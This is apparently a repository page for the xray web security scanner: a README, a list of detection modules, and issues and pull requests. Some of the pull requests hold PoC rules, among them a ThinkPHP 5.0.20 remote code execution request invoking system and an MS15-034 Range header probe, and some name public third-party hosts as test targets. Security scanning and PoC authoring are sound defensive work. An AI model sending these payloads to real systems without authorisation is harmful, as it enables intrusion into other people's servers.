A complete security assessment tool that scans for common web security issues and supports custom PoCs | Be sure to read the documentation before use

Welcome to xray 👋

Documentation

A powerful security assessment tool

Demo

🏠 Documentation ⬇️ Download

Note: xray is not open source; download the prebuilt binaries directly. This repository mainly holds community-contributed PoCs, which are packaged automatically with every xray release.

🚀 Quick start

Before use, be sure to read and agree to the terms in the License file; otherwise, do not install or use this tool.

  1. Crawl with the basic crawler and scan the crawled links for vulnerabilities

    xray webscan --basic-crawler http://example.com --html-output vuln.html
  2. Passive scanning through an HTTP proxy

    xray webscan --listen 127.0.0.1:7777 --html-output proxy.html

    Set the browser's HTTP proxy to http://127.0.0.1:7777 and the proxied traffic is analysed and scanned automatically.

    To scan HTTPS traffic, read the "Capturing HTTPS traffic" section of the documentation below.

  3. Scan a single URL only, without the crawler

    xray webscan --url http://example.com/?a=b --html-output single-url.html
  4. Manually choose the plugins for this run

    By default all built-in plugins are enabled; the following commands restrict the scan to the plugins listed.

    xray webscan --plugins cmd-injection,sqldet --url http://example.com
    xray webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777
  5. Choose the output

    The findings of a scan can be written to one or more files:

    xray webscan --url http://example.com/?a=b \
    --text-output result.txt --json-output result.json --html-output report.html

    Sample report

For other usage, read the documentation: https://docs.xray.cool

🛠 Detection modules

New detection modules are added continually

  • XSS detection (key: xss)

    Detects XSS vulnerabilities using semantic analysis

  • SQL injection detection (key: sqldet)

    Supports error-based, boolean-based and time-based blind injection, among others

  • Command/code injection detection (key: cmd-injection)

    Supports shell command injection, PHP code execution, template injection and more

  • Directory enumeration (key: dirscan)

    Detects more than ten categories of sensitive paths and files, such as backup files, temporary files, debug pages and configuration files

  • Path traversal detection (key: path-traversal)

    Supports common platforms and encodings

  • XML external entity injection detection (key: xxe)

    Supports detection both with direct echo and via the reverse-connection platform

  • PoC management (key: phantasm)

    Ships with a set of commonly used PoCs built in; users can write and run their own PoCs as needed. Documentation: https://docs.xray.cool/#/guide/poc

  • File upload detection (key: upload)

    Supports common backend languages

  • Weak password detection (key: brute-force)

    The community edition detects weak passwords in HTTP basic authentication and simple login forms, with built-in dictionaries of common usernames and passwords

  • JSONP detection (key: jsonp)

    Detects JSONP endpoints that expose sensitive information readable cross-origin

  • SSRF detection (key: ssrf)

    SSRF detection module supporting common bypass techniques and reverse-connection platform detection

  • Baseline checks (key: baseline)

    Detects outdated SSL/TLS versions, missing or incorrectly added HTTP headers, and more

  • Open redirect detection (key: redirect)

    Supports HTML meta redirects, 30x redirects and more

  • CRLF injection (key: crlf-injection)

    Detects HTTP header injection; supports parameters in the query, body and other positions

  • Struts2 vulnerability detection (advanced edition, key: struts)

    Detects whether the target site is affected by Struts2 vulnerabilities, including common ones such as s2-016, s2-032 and s2-045

  • ThinkPHP vulnerability detection (advanced edition, key: thinkphp)

    Detects vulnerabilities in sites built with ThinkPHP

  • ...

⚡️ Advanced usage

For the following advanced usage, see https://docs.xray.cool/.

  • Modifying the configuration file
  • Capturing HTTPS traffic
  • Modifying HTTP request settings
  • Using the reverse-connection platform
  • ...

😘 Contributing PoCs

See: https://docs.xray.cool/#/guide/contribute

📝 Discussion

Before reporting false positives, false negatives, feature requests and so on, be sure to read https://docs.xray.cool/#/guide/feedback

If you have questions, open an issue on GitHub or ask in one of the discussion groups below

  1. GitHub issue: https://github.com/chaitin/xray/issues
  2. QQ group: 717365081
  3. WeChat group: scan the QR code below to follow the xray official account, click the menu item to join the group, and follow the prompts.

Comments
  • 1.9.3 reverse-connection error

    I am using a self-hosted reverse-connection platform and have not configured DNS reverse connection at all (dns_server_ip: ""). The same configuration file produced no error on version 1.8, but on this version every run keeps logging the error [ERRO] [runner client:reverse.go:20] got domain error, reverse/client config dns_server_ip is empty

  • 74cms-sqli-2

    What vulnerability does this PoC detect

    Detects whether the file /plus/ajax_officebuilding.php of 骑士CMS (74cms) V3.4.20140530 has a SQL injection vulnerability

    Test environment

    http://www.cnxxrcw.cn/

    Remarks

    Because this 74cms version is quite old, it is hard to set up a local environment, so I found a host on the public internet that reproduces the vulnerability. There is also a 74cms PoC in another PR, with the same test environment.

  • Some feature enhancement suggestions

    0x00 JSON output format

    Can the JSON be written one object per line? The current --json-output is pretty-printed: it starts with [ and each object is joined with a comma, which is hard to handle when monitoring the result file and awkward to view with jq. One JSON object per line, without pretty-printing, would be ideal.

    0x01 Headers

    Currently only one header can be preset, so the raw mitm traffic and xray's scan traffic easily get mixed together, which makes it hard to write rules downstream in nginx Lua. Could mitm and scan traffic have separate headers? That would make them easy to tell apart. So I suggest two custom header settings in config.yml: one for mitm and one for scanning.

    0x02 Webhook

    After a finding, sending a POST request carrying the raw JSON to a configured URL would be ideal.

    0x03 Reverse connection

    Could it integrate with dnslog platforms later? Or align the format so that a dnslog platform can asynchronously send a request back.

    0x04 HTTP proxy

    Could the HTTP proxy be made compatible with tools such as proxychains(-ng)? (Switching the proxy library might be enough, e.g. v2ray-core has good compatibility.) For example, proxychains4 python soft.py to route traffic into xray.

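The JSON Lines conversion requested in 0x00 can be done outside xray. The script below is an added example, not part of this issue or of xray itself: it reads a pretty-printed JSON array of the shape the report describes (opened with `[`, comma-separated objects) and emits one compact JSON object per line, so the file can be tailed or piped into jq. It tolerates an array that is still open because the scan has not finished. The sample records and their field names (`plugin`, `target`) are constructed placeholders, not xray's real report schema.

```python
import json
import sys
from typing import Iterator, List

# Constructed sample in the shape the issue describes: a pretty-printed
# array, opened with '[' and comma-separated, with no closing ']' yet
# because the scan is still running. Field names are hypothetical
# placeholders, not xray's actual report schema.
SAMPLE_JSON_OUTPUT = """[
  {
    "plugin": "sqldet",
    "target": "http://example.com/?a=b"
  },
  {
    "plugin": "xss",
    "target": "http://example.com/?q=1"
  }
"""


def iter_array_elements(text: str) -> Iterator[dict]:
    """Yield each complete top-level element of a JSON array.

    Works on an unterminated array: elements are decoded one at a time
    with raw_decode, and a trailing element that is only partially
    written is skipped instead of failing the whole file.
    """
    decoder = json.JSONDecoder()
    pos, end = 0, len(text)
    while pos < end and text[pos].isspace():
        pos += 1
    if pos < end and text[pos] == "[":
        pos += 1
    while True:
        # skip whitespace and commas between elements
        while pos < end and (text[pos].isspace() or text[pos] == ","):
            pos += 1
        if pos >= end or text[pos] == "]":
            return
        try:
            obj, pos = decoder.raw_decode(text, pos)
        except json.JSONDecodeError:
            return  # last element not fully written yet
        yield obj


def to_ndjson(text: str) -> List[str]:
    """Return one compact JSON document per array element (JSON Lines)."""
    return [
        json.dumps(obj, ensure_ascii=False, separators=(",", ":"))
        for obj in iter_array_elements(text)
    ]


if __name__ == "__main__":
    # usage: python xray_ndjson.py result.json > result.ndjson
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            source = fh.read()
    else:
        source = SAMPLE_JSON_OUTPUT
    for line in to_ndjson(source):
        print(line)
```

Re-running the script on a growing result file re-emits everything decoded so far; a watcher that only wants new findings can count the lines it has already consumed and skip that many.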
  • On logic branches in PoCs

    A topic for discussion: is it worth supporting logic branches in PoCs? As far as I understand xray, a PoC can only execute downward and exits as soon as an expression evaluates to false.

    Consider a special case: a vulnerability requires two requests. The first has three possible outcomes, two of which mean the vulnerability exists; the second, given that the vulnerability exists, sends different requests depending on the response.

    Without logic branches this needs two PoCs, and those two PoCs need up to four requests to verify the vulnerability, and at least two.

    With logic branches the number of requests drops to at least one and at most two, an optimisation in request count.

    Second, it follows the principle of one PoC per vulnerability, which makes PoC submissions cleaner.

    Moreover, besides an if/switch implementation, logic branches only really need support for ternary expressions and assignment inside expression to allow a fairly hacky kind of branching; consider the pseudocode below

    expression: response == 200 && set(value = test1) || response == 201 && set(value = test2) || response == 202 && set(value = test3)
    ...
    path: {{!! value == test1 ? '/param1' : (value == test2 ? '/param2' : '/param3') !!}}

    This approach gets messy as the number of requests grows, because it does not explicitly indicate the parent level. The mess could be roughly worked around with dynamic assignment, e.g. encoding the flow path as 001, 011 and so on, but full branch logic may be the better solution

    If I have misunderstood the PoC flow, please correct me

  • Add jira-ssrf-cve-2019-8451 POC

    What vulnerability does this PoC detect

    Detects the Jira unauthenticated SSRF vulnerability (CVE-2019-8451)

    Test environment

    Setting up the test environment:

    sudo docker pull cptactionhank/atlassian-jira:7.8.0
    sudo docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

    Then register an Atlassian account, apply for a trial license and follow the setup wizard.

    Remarks

    Local test screenshot: [image]

  • Create poc-yaml-HTTP.SYS-MS15-034-RCE

    Summary

    what POC is this PR for? poc-yaml-HTTP.SYS-MS15-034-RCE

    POC

    name: poc-yaml-HTTP.SYS-MS15-034-RCE
    rules:
      - method: GET
        path: /
        headers:
          User-Agent: >-
            Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36
            (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
          Range: bytes=0-18446744073709551615
        follow_redirects: true
        expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')
    

    Test Environment

    The vuln can be reproduced in the following docker environment.

    Dockerfile:

    http://107.167.27.251/
    

    Remarks

    Write your voice here.

  • tp5.0.20update

    Summary

    what POC is this PR for? thinkphp 5.0.20-rce

    POC

    name: poc-yaml-tp5.0.20
    rules:
      - method: GET
        path: >-
          /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20vulnerable
        follow_redirects: false
        expression: status==200 && body.bcontains(b'vulnerable')
    

    Test Environment

    http://39.105.202.187:8080 The vuln can be reproduced in the following docker environment.

    Dockerfile:

    Or docker-compose:

    version: '3'
    services:
      web:
        image: vulhub/thinkphp:5.0.20
        ports:
          - "8080:80"
    

    Remarks

    Write your voice here.

  • create poc-yaml-zentao-php-api-sql

    Please make sure the following requirements are met first

    • Read the PoC submission rules and requirements https://chaitin.github.io/xray/#/guide/contribute https://chaitin.github.io/xray/#/guide/high_quality_poc
    • The merged and unmerged pull requests in this repo do not already contain the same PoC; you can check with the search box at the top left of the web page
    • Submit only one PoC per pull request where possible, otherwise review and revision may interfere with each other
    • Do not submit 0day / 1day vulnerabilities whose details are not yet widely public; contact a group admin privately instead
    • For the test environment below, refer to vulhub and vulnapps. Do not enter the address of an unpatched site on the public internet; for special cases, resolve it privately. PoCs without a test environment are not accepted
    • If your PoC is merged, or not merged but a comment says a reward will be sent, see https://chaitin.github.io/xray/#/guide/feedback and add the WeChat contact at the bottom, stating your PoC address so the reward can be sent.

    I am the divider. When filling in the PoC submission description, be sure to read the requirements above, then delete this divider and everything above it and keep only your own content below; otherwise the submission will not be approved.


    What vulnerability does this PoC detect

    Tongda OA upload + RCE

    Test environment

    Windows Server 2012, TDOA11.3.exe, download link: https://cdndown.tongda2000.com/oa/2019/TDOA11.3.exe

    Remarks

    Debugged successfully; multiple local tests all passed.

    xray invocation: ./xray webscan --plugins phantasm --poc tongda-oa-rce.yml --url http://10.211.55.16

  • It does nothing

    netikras@netikras-xps:~/received$ ./xray_linux_amd64 servicescan --target x.x.96.13:443
    
     __   __  _____              __     __
     \ \ / / |  __ \      /\     \ \   / /
      \ V /  | |__) |    /  \     \ \_/ / 
       > <   |  _  /    / /\ \     \   /  
      / . \  | | \ \   / ____ \     | |   
     /_/ \_\ |_|  \_\ /_/    \_\    |_|   
                                          
    
    Version: 0.19.2/532ab599/COMMUNITY
    
    [INFO] 2020-02-29 20:25:49 +0200 [default:single.go:334] wait for task done
    netikras@netikras-xps:~/received$ echo $?
    0
    netikras@netikras-xps:~/received$
    IP has been masked before posting the issue
  • magento2.2-sqli.yml

    What vulnerability does this PoC detect

    SQL injection

    Test environment

    magento

    Remarks

    author: lnk23y links: https://github.com/vulhub/vulhub/tree/master/magento/2.2-sqli

  • Add files via upload

    What vulnerability does this PoC detect

    Joomla! configuration.php file RCE vulnerability (CNVD-2019-34135)

    Test environment

    Set up a test instance from https://downloads.joomla.org/it/cms/joomla3/3-4-6

    Remarks

    Do not use the cookie that comes with the default configuration, otherwise the vulnerability may not be detected

  • Crawling POST Parameters

    Hello Developers,

    The tool is great. After many scans I've discovered, and am sure, that the tool does not crawl all parameters in pages, especially the "parameters" in the "Filter Categories"; most of these "Filters" are POST requests.

    Here is a live example for the Filter Categories

    Step 1 https://i.ibb.co/0KNTH20/1.png

    Step 2 https://i.ibb.co/y69q7x7/2.png

    Step 3 https://i.ibb.co/YpD7vWJ/3.png

    I hope my explanation is clear, and I hope the developers find a solution to fix the crawl techniques so that the tool crawls POST requests like these and extracts more "parameters".

    Best Regards, and keep this tool UP!

  • dirscan admin scan produces duplicate results

    Scanning dirscan/admin/default produces results with different suffixes. This also seems to be a problem of the new 1.9.x versions; it was not seen on 1.8.x

    https://example.com/admin.html
    https://example.com/admin.jsp
    https://example.com/admin.do
    https://example.com/admin.asp
    https://example.com/admin
    https://example.com/admin/
    
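For reading a report that lists the same path under several suffixes, as in the output quoted above, the following is an added example and not xray's code: it groups dirscan hits by their path stem so each distinct path appears once with every reported variant listed next to it. The URLs are the ones from the report; the suffix list the stem normalisation strips is an assumption, not something dirscan documents. Grouping is for triage only: `/admin.jsp` and `/admin.html` can still be different resources, which is why the variants are kept rather than discarded.

```python
import re
from collections import OrderedDict
from typing import Dict, List
from urllib.parse import urlsplit

# URLs copied from the report above (example.com placeholders).
SAMPLE_HITS = [
    "https://example.com/admin.html",
    "https://example.com/admin.jsp",
    "https://example.com/admin.do",
    "https://example.com/admin.asp",
    "https://example.com/admin",
    "https://example.com/admin/",
]

# Suffixes dirscan appears to try; this list is an assumption, extend as needed.
_SUFFIX_RE = re.compile(r"\.(?:html?|jsp|do|asp|aspx|php)$", re.IGNORECASE)


def path_stem(url: str) -> str:
    """Normalise a hit to its path without trailing slash or known suffix."""
    path = urlsplit(url).path.rstrip("/") or "/"
    return _SUFFIX_RE.sub("", path)


def group_by_stem(urls: List[str]) -> Dict[str, List[str]]:
    """Group hits so that one entry per stem lists every variant reported."""
    groups: "OrderedDict[str, List[str]]" = OrderedDict()
    for url in urls:
        groups.setdefault(path_stem(url), []).append(url)
    return groups


def summarise(urls: List[str]) -> List[str]:
    """One line per stem: the stem, the hit count, and the variants seen."""
    return [
        f"{stem}: {len(hits)} variants ({', '.join(hits)})"
        for stem, hits in group_by_stem(urls).items()
    ]


if __name__ == "__main__":
    # usage: python dirscan_group.py  (reads the constructed sample)
    for line in summarise(SAMPLE_HITS):
        print(line)
```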
  • Bump express from 4.17.1 to 4.18.2 in /report

    Bumps express from 4.17.1 to 4.18.2.

    Release notes

    Sourced from express's releases.

    4.18.2

    4.18.1

    • Fix hanging on large stack of sync routes

    4.18.0

    ... (truncated)

    Changelog

    Sourced from express's changelog.

    4.18.2 / 2022-10-08

    4.18.1 / 2022-04-29

    • Fix hanging on large stack of sync routes

    4.18.0 / 2022-04-25

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

  • Bump qs from 6.5.2 to 6.5.3 in /report

    Bumps qs from 6.5.2 to 6.5.3.

    Changelog

    Sourced from qs's changelog.

    6.5.3

    • [Fix] parse: ignore __proto__ keys (#428)
    • [Fix] utils.merge: avoid a crash with a null target and a truthy non-array source
    • [Fix] correctly parse nested arrays
    • [Fix] stringify: fix a crash with strictNullHandling and a custom filter/serializeDate (#279)
    • [Fix] utils: merge: fix crash when source is a truthy primitive & no options are provided
    • [Fix] when parseArrays is false, properly handle keys ending in []
    • [Fix] fix for an impossible situation: when the formatter is called with a non-string value
    • [Fix] utils.merge: avoid a crash with a null target and an array source
    • [Refactor] utils: reduce observable [[Get]]s
    • [Refactor] use cached Array.isArray
    • [Refactor] stringify: Avoid arr = arr.concat(...), push to the existing instance (#269)
    • [Refactor] parse: only need to reassign the var once
    • [Robustness] stringify: avoid relying on a global undefined (#427)
    • [readme] remove travis badge; add github actions/codecov badges; update URLs
    • [Docs] Clean up license text so it’s properly detected as BSD-3-Clause
    • [Docs] Clarify the need for "arrayLimit" option
    • [meta] fix README.md (#399)
    • [meta] add FUNDING.yml
    • [actions] backport actions from main
    • [Tests] always use String(x) over x.toString()
    • [Tests] remove nonexistent tape option
    • [Dev Deps] backport from main
    Commits
    • 298bfa5 v6.5.3
    • ed0f5dc [Fix] parse: ignore __proto__ keys (#428)
    • 691e739 [Robustness] stringify: avoid relying on a global undefined (#427)
    • 1072d57 [readme] remove travis badge; add github actions/codecov badges; update URLs
    • 12ac1c4 [meta] fix README.md (#399)
    • 0338716 [actions] backport actions from main
    • 5639c20 Clean up license text so it’s properly detected as BSD-3-Clause
    • 51b8a0b add FUNDING.yml
    • 45f6759 [Fix] fix for an impossible situation: when the formatter is called with a no...
    • f814a7f [Dev Deps] backport from main
    • Additional commits viewable in compare view


  • Bump decode-uri-component from 0.2.0 to 0.2.2 in /report

    Bumps decode-uri-component from 0.2.0 to 0.2.2.

    Release notes

    Sourced from decode-uri-component's releases.

    v0.2.2

    • Prevent overwriting previously decoded tokens 980e0bf

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.1...v0.2.2

    v0.2.1

    • Switch to GitHub workflows 76abc93
    • Fix issue where decode throws - fixes #6 746ca5d
    • Update license (#1) 486d7e2
    • Tidelift tasks a650457
    • Meta tweaks 66e1c28

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.0...v0.2.1

    Commits

